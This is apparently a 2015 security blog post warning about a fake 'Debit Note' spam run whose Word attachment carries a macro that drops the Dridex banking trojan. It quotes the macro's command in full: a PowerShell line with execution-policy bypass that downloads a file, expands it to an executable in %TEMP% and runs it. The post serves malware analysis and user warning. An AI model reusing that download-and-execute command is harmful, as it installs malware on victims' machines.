Sponsored by..

Tuesday 31 March 2015

Malware spam: "Debit Note [12345] information attached to this email"

This fake financial spam comes with a malicious attachment. There is no body text:
From:    Scot Dennis
Date:    31 March 2015 at 14:32
Subject:    Debit Note [09993] information attached to this email
The number in the brackets varies, and the attachment seems to be randomly named (for example. 42549959.doc). There are probably many, many variants of this but the sample I saw had this malicious macro [pastebin] that executed the following command:
cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('','%TEMP%\4543543.cab'); expand %TEMP%\4543543.cab %TEMP%\4543543.exe; start %TEMP%\4543543.exe;
The executable downloaded is identical to the one used in this spam run also taking place today. The payload is the Dridex banking trojan.

No comments: